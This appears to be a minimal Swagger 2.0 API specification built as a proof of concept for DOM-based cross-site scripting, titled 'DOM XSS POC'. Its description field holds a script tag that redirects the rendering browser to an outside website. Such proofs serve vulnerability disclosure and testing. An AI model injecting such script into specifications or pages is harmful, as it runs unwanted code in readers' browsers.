swagger: '2.0'
info:
  version: "0.0.1"
  title: DOM XSS POC
  description: <script>location.href = 'https://www.nba.com';</script>
paths:
  /:
    get:
      responses:
        200:
          description: Success
